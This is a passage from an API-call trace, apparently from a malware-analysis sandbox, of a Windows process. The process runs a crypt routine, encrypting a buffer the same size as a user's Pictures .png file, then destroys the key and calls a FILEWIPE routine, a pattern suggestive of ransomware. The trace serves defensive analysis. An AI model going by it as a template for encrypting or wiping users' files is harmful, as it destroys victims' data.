hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.366] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.366] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0190.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0190.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0190.366] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.366] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0190.366] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0190.366] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0190.366] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.366] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0190.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0190.366] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.366] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0190.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0190.366] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.366] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.366] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.367] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0190.367] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.367] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0190.367] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.368] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.368] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xa046, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xa050) returned 1 [0190.368] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.368] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0190.368] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.368] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.368] CharLowerBuffW (in: lpsz="byte[41041]", cchLength=0xb | out: lpsz="byte[41041]") returned 0xb [0190.368] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.370] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.370] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.371] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.371] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.371] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa5f008*, pdwDataLen=0x87e820*=0xa046, dwBufLen=0xa050 | out: pbData=0xa5f008*, pdwDataLen=0x87e820*=0xa050) returned 1 [0190.371] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.371] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0190.371] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.373] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.373] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.373] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.373] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0190.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0190.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.373] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.373] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0190.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.373] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.373] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0190.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0190.374] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.374] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.374] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0190.374] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0190.374] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0190.374] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.379] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.379] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0190.379] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.383] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.383] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.383] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0190.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.384] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.384] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0190.384] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0190.384] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.384] CryptDestroyKey (hKey=0x90af18) returned 1 [0190.384] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.384] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.385] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0190.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0190.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.385] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0190.385] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0190.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.385] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0190.385] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0190.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0190.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0190.385] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0190.385] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0190.385] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0190.385] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0190.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0190.385] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0190.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0190.385] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.385] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.386] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.386] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0190.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0190.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.386] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.386] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0190.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.386] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.386] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0190.386] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.397] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0190.397] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0190.397] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.397] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0190.397] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0190.397] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0190.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0190.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0190.397] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0190.397] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.398] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0190.398] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.398] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.398] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0190.398] FreeLibrary (hLibModule=0x74f20000) returned 1 [0190.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0190.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0190.398] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0190.398] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0190.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0190.398] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.398] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.399] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.400] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.400] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0190.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0190.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.400] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.400] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.400] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9489db00, ftCreationTime.dwHighDateTime=0x1d5df5e, ftLastAccessTime.dwLowDateTime=0x82a6dc10, ftLastAccessTime.dwHighDateTime=0x1d5dc77, ftLastWriteTime.dwLowDateTime=0x82a6dc10, ftLastWriteTime.dwHighDateTime=0x1d5dc77, nFileSizeHigh=0x0, nFileSizeLow=0xa046, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="x6Gb.png", cAlternateFileName="")) returned 0x90af58 [0190.400] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0190.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0190.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0190.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0190.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.400] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.400] CharLowerBuffW (in: lpsz="byte[41030]", cchLength=0xb | out: lpsz="byte[41030]") returned 0xb [0190.401] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.401] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0190.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0190.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.401] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, 